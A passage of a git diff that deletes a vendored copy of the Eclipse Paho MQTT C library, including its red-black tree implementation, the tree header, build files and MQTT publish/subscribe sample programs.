-			newel = (aTree->heap_tracking) ? mymalloc(__FILE__, __LINE__, sizeof(Node)) : malloc(sizeof(Node));
-		#endif
-		memset(newel, '\0', sizeof(Node));
-		if (curparent)
-			curparent->child[left] = newel;
-		else
-			aTree->index[index].root = newel;
-		newel->parent = curparent;
-		newel->red = 1;
-		if (index == 0)
-		{
-			++(aTree->count);
-			aTree->size += size;
-		}
-	}
-	newel->content = content;
-	newel->size = size;
-	TreeBalanceAfterAdd(aTree, newel, index);
-	return rc;
-}
-
-
-void* TreeAdd(Tree* aTree, void* content, size_t size)
-{
-	void* rc = NULL;
-	int i;
-
-	for (i = 0; i < aTree->indexes; ++i)
-		rc = TreeAddByIndex(aTree, content, size, i);
-
-	return rc;
-}
-
-
-Node* TreeFindIndex1(Tree* aTree, void* key, int index, int value)
-{
-	int result = 0;
-	Node* curnode = aTree->index[index].root;
-
-	while (curnode)
-	{
-		result = aTree->index[index].compare(curnode->content, key, value);
-		if (result == 0)
-			break;
-		else
-			curnode = curnode->child[result > 0];
-	}
-	return curnode;
-}
-
-
-Node* TreeFindIndex(Tree* aTree, void* key, int index)
-{
-	return TreeFindIndex1(aTree, key, index, 0);
-}
-
-
-Node* TreeFindContentIndex(Tree* aTree, void* key, int index)
-{
-	return TreeFindIndex1(aTree, key, index, 1);
-}
-
-
-Node* TreeFind(Tree* aTree, void* key)
-{
-	return TreeFindIndex(aTree, key, 0);
-}
-
-
-Node* TreeMinimum(Node* curnode)
-{
-	if (curnode)
-		while (curnode->child[LEFT])
-			curnode = curnode->child[LEFT];
-	return curnode;
-}
-
-
-Node* TreeSuccessor(Node* curnode)
-{
-	if (curnode->child[RIGHT])
-		curnode = TreeMinimum(curnode->child[RIGHT]);
-	else
-	{
-		Node* curparent = curnode->parent;
-		while (curparent && curnode == curparent->child[RIGHT])
-		{
-			curnode = curparent;
-			curparent = curparent->parent;
-		}
-		curnode = curparent;
-	}
-	return curnode;
-}
-
-
-Node* TreeNextElementIndex(Tree* aTree, Node* curnode, int index)
-{
-	if (curnode == NULL)
-		curnode = TreeMinimum(aTree->index[index].root);
-	else
-		curnode = TreeSuccessor(curnode);
-	return curnode;
-}
-
-
-Node* TreeNextElement(Tree* aTree, Node* curnode)
-{
-	return TreeNextElementIndex(aTree, curnode, 0);
-}
-
-
-Node* TreeBARSub(Tree* aTree, Node* curnode, int which, int index)
-{
-	Node* sibling = curnode->parent->child[which];
-
-	if (isRed(sibling))
-	{
-		sibling->red = 0;
-		curnode->parent->red = 1;
-		TreeRotate(aTree, curnode->parent, !which, index);
-		sibling = curnode->parent->child[which];
-	}
-	if (!sibling)
-		curnode = curnode->parent;
-	else if (isBlack(sibling->child[!which]) && isBlack(sibling->child[which]))
-	{
-		sibling->red = 1;
-		curnode = curnode->parent;
-	}
-	else
-	{
-		if (isBlack(sibling->child[which]))
-		{
-			sibling->child[!which]->red = 0;
-			sibling->red = 1;
-			TreeRotate(aTree, sibling, which, index);
-			sibling = curnode->parent->child[which];
-		}
-		sibling->red = curnode->parent->red;
-		curnode->parent->red = 0;
-		sibling->child[which]->red = 0;
-		TreeRotate(aTree, curnode->parent, !which, index);
-		curnode = aTree->index[index].root;
-	}
-	return curnode;
-}
-
-
-void TreeBalanceAfterRemove(Tree* aTree, Node* curnode, int index)
-{
-	while (curnode != aTree->index[index].root && isBlack(curnode))
-	{
-		/* curnode->content == NULL must equal curnode == NULL */
-		if (((curnode->content) ? curnode : NULL) == curnode->parent->child[LEFT])
-			curnode = TreeBARSub(aTree, curnode, RIGHT, index);
-		else
-			curnode = TreeBARSub(aTree, curnode, LEFT, index);
-    }
-	curnode->red = 0;
-}
-
-
-/**
- * Remove an item from a tree
- * @param aTree the list to which the item is to be added
- * @param curnode the list item content itself
- */
-void* TreeRemoveNodeIndex(Tree* aTree, Node* curnode, int index)
-{
-	Node* redundant = curnode;
-	Node* curchild = NULL;
-	size_t size = curnode->size;
-	void* content = curnode->content;
-
-	/* if the node to remove has 0 or 1 children, it can be removed without involving another node */
-	if (curnode->child[LEFT] && curnode->child[RIGHT]) /* 2 children */
-		redundant = TreeSuccessor(curnode); 	/* now redundant must have at most one child */
-
-	curchild = redundant->child[(redundant->child[LEFT] != NULL) ? LEFT : RIGHT];
-	if (curchild) /* we could have no children at all */
-		curchild->parent = redundant->parent;
-
-	if (redundant->parent == NULL)
-		aTree->index[index].root = curchild;
-	else
-	{
-		if (redundant == redundant->parent->child[LEFT])
-			redundant->parent->child[LEFT] = curchild;
-		else
-			redundant->parent->child[RIGHT] = curchild;
-	}
-
-	if (redundant != curnode)
-	{
-		curnode->content = redundant->content;
-		curnode->size = redundant->size;
-	}
-
-	if (isBlack(redundant))
-	{
-		if (curchild == NULL)
-		{
-			if (redundant->parent)
-			{
-				Node temp;
-				memset(&temp, '\0', sizeof(Node));
-				temp.parent = (redundant) ? redundant->parent : NULL;
-				temp.red = 0;
-				TreeBalanceAfterRemove(aTree, &temp, index);
-			}
-		}
-		else
-			TreeBalanceAfterRemove(aTree, curchild, index);
-	}
-
-#if defined(UNIT_TESTS)
-	free(redundant);
-#else
-	(aTree->heap_tracking) ? myfree(__FILE__, __LINE__, redundant) : free(redundant);
-#endif
-	if (index == 0)
-	{
-		aTree->size -= size;
-		--(aTree->count);
-	}
-	return content;
-}
-
-
-/**
- * Remove an item from a tree
- * @param aTree the list to which the item is to be added
- * @param curnode the list item content itself
- */
-void* TreeRemoveIndex(Tree* aTree, void* content, int index)
-{
-	Node* curnode = TreeFindContentIndex(aTree, content, index);
-
-	if (curnode == NULL)
-		return NULL;
-
-	return TreeRemoveNodeIndex(aTree, curnode, index);
-}
-
-
-void* TreeRemove(Tree* aTree, void* content)
-{
-	int i;
-	void* rc = NULL;
-
-	for (i = 0; i < aTree->indexes; ++i)
-		rc = TreeRemoveIndex(aTree, content, i);
-
-	return rc;
-}
-
-
-void* TreeRemoveKeyIndex(Tree* aTree, void* key, int index)
-{
-	Node* curnode = TreeFindIndex(aTree, key, index);
-	void* content = NULL;
-	int i;
-
-	if (curnode == NULL)
-		return NULL;
-
-	content = TreeRemoveNodeIndex(aTree, curnode, index);
-	for (i = 0; i < aTree->indexes; ++i)
-	{
-		if (i != index)
-			content = TreeRemoveIndex(aTree, content, i);
-	}
-	return content;
-}
-
-
-void* TreeRemoveKey(Tree* aTree, void* key)
-{
-	return TreeRemoveKeyIndex(aTree, key, 0);
-}
-
-
-int TreeIntCompare(void* a, void* b, int content)
-{
-	int i = *((int*)a);
-	int j = *((int*)b);
-
-	/* printf("comparing %d %d\n", *((int*)a), *((int*)b)); */
-	return (i > j) ? -1 : (i == j) ? 0 : 1;
-}
-
-
-int TreePtrCompare(void* a, void* b, int content)
-{
-	return (a > b) ? -1 : (a == b) ? 0 : 1;
-}
-
-
-int TreeStringCompare(void* a, void* b, int content)
-{
-	return strcmp((char*)a, (char*)b);
-}
-
-
-#if defined(UNIT_TESTS)
-
-int check(Tree *t)
-{
-	Node* curnode = NULL;
-	int rc = 0;
-
-	curnode = TreeNextElement(t, curnode);
-	while (curnode)
-	{
-		Node* prevnode = curnode;
-
-		curnode = TreeNextElement(t, curnode);
-
-		if (prevnode && curnode && (*(int*)(curnode->content) < *(int*)(prevnode->content)))
-		{
-			printf("out of order %d < %d\n", *(int*)(curnode->content), *(int*)(prevnode->content));
-			rc = 99;
-		}
-	}
-	return rc;
-}
-
-
-int traverse(Tree *t, int lookfor)
-{
-	Node* curnode = NULL;
-	int rc = 0;
-
-	printf("Traversing\n");
-	curnode = TreeNextElement(t, curnode);
-	/* printf("content int %d\n", *(int*)(curnode->content)); */
-	while (curnode)
-	{
-		Node* prevnode = curnode;
-
-		curnode = TreeNextElement(t, curnode);
-		/* if (curnode)
-			printf("content int %d\n", *(int*)(curnode->content)); */
-		if (prevnode && curnode && (*(int*)(curnode->content) < *(int*)(prevnode->content)))
-		{
-			printf("out of order %d < %d\n", *(int*)(curnode->content), *(int*)(prevnode->content));
-		}
-		if (curnode && (lookfor == *(int*)(curnode->content)))
-			printf("missing item %d actually found\n", lookfor);
-	}
-	printf("End traverse %d\n", rc);
-	return rc;
-}
-
-
-int test(int limit)
-{
-	int i, *ip, *todelete;
-	Node* current = NULL;
-	Tree* t = TreeInitialize(TreeIntCompare);
-	int rc = 0;
-
-	printf("Tree initialized\n");
-
-	srand(time(NULL));
-
-	ip = malloc(sizeof(int));
-	*ip = 2;
-	TreeAdd(t, (void*)ip, sizeof(int));
-
-	check(t);
-
-	i = 2;
-	void* result = TreeRemove(t, (void*)&i);
-	if (result)
-		free(result);
-
-	int actual[limit];
-	for (i = 0; i < limit; i++)
-	{
-		void* replaced = NULL;
-
-		ip = malloc(sizeof(int));
-		*ip = rand();
-		replaced = TreeAdd(t, (void*)ip, sizeof(int));
-		if (replaced) /* duplicate */
-		{
-			free(replaced);
-			actual[i] = -1;
-		}
-		else
-			actual[i] = *ip;
-		if (i==5)
-			todelete = ip;
-		printf("Tree element added %d\n",  *ip);
-		if (1 % 1000 == 0)
-		{
-			rc = check(t);
-			printf("%d elements, check result %d\n", i+1, rc);
-			if (rc != 0)
-				return 88;
-		}
-	}
-
-	check(t);
-
-	for (i = 0; i < limit; i++)
-	{
-		int parm = actual[i];
-
-		if (parm == -1)
-			continue;
-
-		Node* found = TreeFind(t, (void*)&parm);
-		if (found)
-			printf("Tree find %d %d\n", parm, *(int*)(found->content));
-		else
-		{
-			printf("%d not found\n", parm);
-			traverse(t, parm);
-			return -2;
-		}
-	}
-
-	check(t);
-
-	for (i = limit -1; i >= 0; i--)
-	{
-		int parm = actual[i];
-		void *found;
-
-		if (parm == -1) /* skip duplicate */
-			continue;
-
-		found = TreeRemove(t, (void*)&parm);
-		if (found)
-		{
-			printf("%d Tree remove %d %d\n", i, parm, *(int*)(found));
-			free(found);
-		}
-		else
-		{
-			int count = 0;
-			printf("%d %d not found\n", i, parm);
-			traverse(t, parm);
-			for (i = 0; i < limit; i++)
-				if (actual[i] == parm)
-					++count;
-			printf("%d occurs %d times\n", parm, count);
-			return -2;
-		}
-		if (i % 1000 == 0)
-		{
-			rc = check(t);
-			printf("%d elements, check result %d\n", i+1, rc);
-			if (rc != 0)
-				return 88;
-		}
-	}
-	printf("finished\n");
-	return 0;
-}
-
-int main(int argc, char *argv[])
-{
-	int rc = 0;
-
-	while (rc == 0)
-		rc = test(999999);
-}
-
-#endif
-
-
-
-
-
diff --git a/thirdparty/paho.mqtt.c/src/Tree.h b/thirdparty/paho.mqtt.c/src/Tree.h
deleted file mode 100644
index bbbd014..0000000
--- a/thirdparty/paho.mqtt.c/src/Tree.h
+++ /dev/null
@@ -1,115 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation and documentation
- *******************************************************************************/
-
-
-#if !defined(TREE_H)
-#define TREE_H
-
-#include <stdlib.h> /* for size_t definition */
-
-/*BE
-defm defTree(T) // macro to define a tree
-
-def T concat Node
-{
-	n32 ptr T concat Node "parent"
-	n32 ptr T concat Node "left"
-	n32 ptr T concat Node "right"
-	n32 ptr T id2str(T)
-	n32 suppress "size"
-}
-
-
-def T concat Tree
-{
-	struct
-	{
-		n32 ptr T concat Node suppress "root"
-		n32 ptr DATA suppress "compare"
-	} 
-	struct
-	{
-		n32 ptr T concat Node suppress "root"
-		n32 ptr DATA suppress "compare"
-	} 
-	n32 dec "count"
-	n32 dec suppress "size"
-}
-
-endm
-
-defTree(INT)
-defTree(STRING)
-defTree(TMP)
-
-BE*/
-
-/**
- * Structure to hold all data for one list element
- */
-typedef struct NodeStruct
-{
-	struct NodeStruct *parent,   /**< pointer to parent tree node, in case we need it */
-					  *child[2]; /**< pointers to child tree nodes 0 = left, 1 = right */
-	void* content;				 /**< pointer to element content */
-	size_t size;					 /**< size of content */
-	unsigned int red : 1;
-} Node;
-
-
-/**
- * Structure to hold all data for one tree
- */
-typedef struct
-{
-	struct
-	{
-		Node *root;	/**< root node pointer */
-		int (*compare)(void*, void*, int); /**< comparison function */
-	} index[2];
-	int indexes,  /**< no of indexes into tree */
-		count;    /**< no of items */
-	size_t size;  /**< heap storage used */
-	unsigned int heap_tracking : 1; /**< switch on heap tracking for this tree? */
-	unsigned int allow_duplicates : 1; /**< switch to allow duplicate entries */
-} Tree;
-
-
-Tree* TreeInitialize(int(*compare)(void*, void*, int));
-void TreeInitializeNoMalloc(Tree* aTree, int(*compare)(void*, void*, int));
-void TreeAddIndex(Tree* aTree, int(*compare)(void*, void*, int));
-
-void* TreeAdd(Tree* aTree, void* content, size_t size);
-
-void* TreeRemove(Tree* aTree, void* content);
-
-void* TreeRemoveKey(Tree* aTree, void* key);
-void* TreeRemoveKeyIndex(Tree* aTree, void* key, int index);
-
-void* TreeRemoveNodeIndex(Tree* aTree, Node* aNode, int index);
-
-void TreeFree(Tree* aTree);
-
-Node* TreeFind(Tree* aTree, void* key);
-Node* TreeFindIndex(Tree* aTree, void* key, int index);
-
-Node* TreeNextElement(Tree* aTree, Node* curnode);
-
-int TreeIntCompare(void* a, void* b, int);
-int TreePtrCompare(void* a, void* b, int);
-int TreeStringCompare(void* a, void* b, int);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/VersionInfo.h.in b/thirdparty/paho.mqtt.c/src/VersionInfo.h.in
deleted file mode 100644
index 5b91bf3..0000000
--- a/thirdparty/paho.mqtt.c/src/VersionInfo.h.in
+++ /dev/null
@@ -1,7 +0,0 @@
-#ifndef VERSIONINFO_H
-#define VERSIONINFO_H
-
-#define BUILD_TIMESTAMP "@BUILD_TIMESTAMP@"
-#define CLIENT_VERSION  "@CLIENT_VERSION@"
-
-#endif /* VERSIONINFO_H */
diff --git a/thirdparty/paho.mqtt.c/src/samples/CMakeLists.txt b/thirdparty/paho.mqtt.c/src/samples/CMakeLists.txt
deleted file mode 100644
index 79ea886..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/CMakeLists.txt
+++ /dev/null
@@ -1,65 +0,0 @@
-#*******************************************************************************
-#  Copyright (c) 2015, 2017 logi.cals GmbH and others
-#
-#  All rights reserved. This program and the accompanying materials
-#  are made available under the terms of the Eclipse Public License v1.0
-#  and Eclipse Distribution License v1.0 which accompany this distribution.
-#
-#  The Eclipse Public License is available at
-#     http://www.eclipse.org/legal/epl-v10.html
-#  and the Eclipse Distribution License is available at
-#    http://www.eclipse.org/org/documents/edl-v10.php.
-#
-#  Contributors:
-#     Rainer Poisel - initial version
-#     Ian Craggs - update sample names
-#*******************************************************************************/
-
-# Note: on OS X you should install XCode and the associated command-line tools
-
-## compilation/linkage settings
-INCLUDE_DIRECTORIES(
-    .
-    ${CMAKE_SOURCE_DIR}/src
-    ${CMAKE_BINARY_DIR}
-    )
-
-IF (WIN32)
-  	ADD_DEFINITIONS(/DCMAKE_BUILD /D_CRT_SECURE_NO_DEPRECATE)
-ENDIF()
-
-# sample files c
-ADD_EXECUTABLE(paho_c_pub paho_c_pub.c)
-ADD_EXECUTABLE(paho_c_sub paho_c_sub.c)
-ADD_EXECUTABLE(paho_cs_pub paho_cs_pub.c)
-ADD_EXECUTABLE(paho_cs_sub paho_cs_sub.c)
-
-TARGET_LINK_LIBRARIES(paho_c_pub paho-mqtt3a)
-TARGET_LINK_LIBRARIES(paho_c_sub paho-mqtt3a)
-TARGET_LINK_LIBRARIES(paho_cs_pub paho-mqtt3c)
-TARGET_LINK_LIBRARIES(paho_cs_sub paho-mqtt3c)
-
-ADD_EXECUTABLE(MQTTAsync_subscribe MQTTAsync_subscribe.c)
-ADD_EXECUTABLE(MQTTAsync_publish MQTTAsync_publish.c)
-ADD_EXECUTABLE(MQTTClient_subscribe MQTTClient_subscribe.c)
-ADD_EXECUTABLE(MQTTClient_publish MQTTClient_publish.c)
-ADD_EXECUTABLE(MQTTClient_publish_async MQTTClient_publish_async.c)
-
-TARGET_LINK_LIBRARIES(MQTTAsync_subscribe paho-mqtt3a)
-TARGET_LINK_LIBRARIES(MQTTAsync_publish paho-mqtt3a)
-TARGET_LINK_LIBRARIES(MQTTClient_subscribe paho-mqtt3c)
-TARGET_LINK_LIBRARIES(MQTTClient_publish paho-mqtt3c)
-TARGET_LINK_LIBRARIES(MQTTClient_publish_async paho-mqtt3c)
-
-INSTALL(TARGETS paho_c_sub
-                paho_c_pub
-                paho_cs_sub
-                paho_cs_pub
-                MQTTAsync_subscribe
-                MQTTAsync_publish
-                MQTTClient_subscribe
-                MQTTClient_publish
-                MQTTClient_publish_async
-
-    RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR}
-    LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR})
diff --git a/thirdparty/paho.mqtt.c/src/samples/MQTTAsync_publish.c b/thirdparty/paho.mqtt.c/src/samples/MQTTAsync_publish.c
deleted file mode 100644
index a524940..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/MQTTAsync_publish.c
+++ /dev/null
@@ -1,154 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *******************************************************************************/
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTAsync.h"
-
-#if !defined(WIN32)
-#include <unistd.h>
-#else
-#include <windows.h>
-#endif
-
-#include <OsWrapper.h>
-
-#define ADDRESS     "tcp://m2m.eclipse.org:1883"
-#define CLIENTID    "ExampleClientPub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTAsync_token deliveredtoken;
-
-int finished = 0;
-
-void connlost(void *context, char *cause)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	int rc;
-
-	printf("\nConnection lost\n");
-	printf("     cause: %s\n", cause);
-
-	printf("Reconnecting\n");
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
- 		finished = 1;
-	}
-}
-
-
-void onDisconnect(void* context, MQTTAsync_successData* response)
-{
-	printf("Successful disconnection\n");
-	finished = 1;
-}
-
-
-void onSend(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_disconnectOptions opts = MQTTAsync_disconnectOptions_initializer;
-	int rc;
-
-	printf("Message with token value %d delivery confirmed\n", response->token);
-
-	opts.onSuccess = onDisconnect;
-	opts.context = client;
-
-	if ((rc = MQTTAsync_disconnect(client, &opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start sendMessage, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-void onConnectFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Connect failed, rc %d\n", response ? response->code : 0);
-	finished = 1;
-}
-
-
-void onConnect(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_responseOptions opts = MQTTAsync_responseOptions_initializer;
-	MQTTAsync_message pubmsg = MQTTAsync_message_initializer;
-	int rc;
-
-	printf("Successful connection\n");
-	
-	opts.onSuccess = onSend;
-	opts.context = client;
-
-	pubmsg.payload = PAYLOAD;
-	pubmsg.payloadlen = strlen(PAYLOAD);
-	pubmsg.qos = QOS;
-	pubmsg.retained = 0;
-	deliveredtoken = 0;
-
-	if ((rc = MQTTAsync_sendMessage(client, TOPIC, &pubmsg, &opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start sendMessage, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-int main(int argc, char* argv[])
-{
-	MQTTAsync client;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	int rc;
-
-	MQTTAsync_create(&client, ADDRESS, CLIENTID, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	MQTTAsync_setCallbacks(client, NULL, connlost, NULL, NULL);
-
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	printf("Waiting for publication of %s\n"
-         "on topic %s for client with ClientID: %s\n",
-         PAYLOAD, TOPIC, CLIENTID);
-	while (!finished)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	MQTTAsync_destroy(&client);
- 	return rc;
-}
-  
diff --git a/thirdparty/paho.mqtt.c/src/samples/MQTTAsync_subscribe.c b/thirdparty/paho.mqtt.c/src/samples/MQTTAsync_subscribe.c
deleted file mode 100644
index d0a01f8..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/MQTTAsync_subscribe.c
+++ /dev/null
@@ -1,190 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *******************************************************************************/
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTAsync.h"
-
-#if !defined(WIN32)
-#include <unistd.h>
-#else
-#include <windows.h>
-#endif
-
-#include <OsWrapper.h>
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientSub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTAsync_token deliveredtoken;
-
-int disc_finished = 0;
-int subscribed = 0;
-int finished = 0;
-
-void connlost(void *context, char *cause)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	int rc;
-
-	printf("\nConnection lost\n");
-	if (cause)
-		printf("     cause: %s\n", cause);
-
-	printf("Reconnecting\n");
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		finished = 1;
-	}
-}
-
-
-int msgarrvd(void *context, char *topicName, int topicLen, MQTTAsync_message *message)
-{
-    int i;
-    char* payloadptr;
-
-    printf("Message arrived\n");
-    printf("     topic: %s\n", topicName);
-    printf("   message: ");
-
-    payloadptr = message->payload;
-    for(i=0; i<message->payloadlen; i++)
-    {
-        putchar(*payloadptr++);
-    }
-    putchar('\n');
-    MQTTAsync_freeMessage(&message);
-    MQTTAsync_free(topicName);
-    return 1;
-}
-
-
-void onDisconnect(void* context, MQTTAsync_successData* response)
-{
-	printf("Successful disconnection\n");
-	disc_finished = 1;
-}
-
-
-void onSubscribe(void* context, MQTTAsync_successData* response)
-{
-	printf("Subscribe succeeded\n");
-	subscribed = 1;
-}
-
-void onSubscribeFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Subscribe failed, rc %d\n", response ? response->code : 0);
-	finished = 1;
-}
-
-
-void onConnectFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Connect failed, rc %d\n", response ? response->code : 0);
-	finished = 1;
-}
-
-
-void onConnect(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_responseOptions opts = MQTTAsync_responseOptions_initializer;
-	int rc;
-
-	printf("Successful connection\n");
-
-	printf("Subscribing to topic %s\nfor client %s using QoS%d\n\n"
-           "Press Q<Enter> to quit\n\n", TOPIC, CLIENTID, QOS);
-	opts.onSuccess = onSubscribe;
-	opts.onFailure = onSubscribeFailure;
-	opts.context = client;
-
-	deliveredtoken = 0;
-
-	if ((rc = MQTTAsync_subscribe(client, TOPIC, QOS, &opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start subscribe, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-int main(int argc, char* argv[])
-{
-	MQTTAsync client;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	MQTTAsync_disconnectOptions disc_opts = MQTTAsync_disconnectOptions_initializer;
-	int rc;
-	int ch;
-
-	MQTTAsync_create(&client, ADDRESS, CLIENTID, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	MQTTAsync_setCallbacks(client, client, connlost, msgarrvd, NULL);
-
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	while	(!subscribed)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	if (finished)
-		goto exit;
-
-	do 
-	{
-		ch = getchar();
-	} while (ch!='Q' && ch != 'q');
-
-	disc_opts.onSuccess = onDisconnect;
-	if ((rc = MQTTAsync_disconnect(client, &disc_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start disconnect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
- 	while	(!disc_finished)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-exit:
-	MQTTAsync_destroy(&client);
- 	return rc;
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/MQTTClient_publish.c b/thirdparty/paho.mqtt.c/src/samples/MQTTClient_publish.c
deleted file mode 100644
index fc71417..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/MQTTClient_publish.c
+++ /dev/null
@@ -1,60 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *******************************************************************************/
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTClient.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientPub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-int main(int argc, char* argv[])
-{
-    MQTTClient client;
-    MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-    MQTTClient_message pubmsg = MQTTClient_message_initializer;
-    MQTTClient_deliveryToken token;
-    int rc;
-
-    MQTTClient_create(&client, ADDRESS, CLIENTID,
-        MQTTCLIENT_PERSISTENCE_NONE, NULL);
-    conn_opts.keepAliveInterval = 20;
-    conn_opts.cleansession = 1;
-
-    if ((rc = MQTTClient_connect(client, &conn_opts)) != MQTTCLIENT_SUCCESS)
-    {
-        printf("Failed to connect, return code %d\n", rc);
-        exit(EXIT_FAILURE);
-    }
-    pubmsg.payload = PAYLOAD;
-    pubmsg.payloadlen = strlen(PAYLOAD);
-    pubmsg.qos = QOS;
-    pubmsg.retained = 0;
-    MQTTClient_publishMessage(client, TOPIC, &pubmsg, &token);
-    printf("Waiting for up to %d seconds for publication of %s\n"
-            "on topic %s for client with ClientID: %s\n",
-            (int)(TIMEOUT/1000), PAYLOAD, TOPIC, CLIENTID);
-    rc = MQTTClient_waitForCompletion(client, token, TIMEOUT);
-    printf("Message with delivery token %d delivered\n", token);
-    MQTTClient_disconnect(client, 10000);
-    MQTTClient_destroy(&client);
-    return rc;
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/MQTTClient_publish_async.c b/thirdparty/paho.mqtt.c/src/samples/MQTTClient_publish_async.c
deleted file mode 100644
index 7784349..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/MQTTClient_publish_async.c
+++ /dev/null
@@ -1,96 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *******************************************************************************/
-
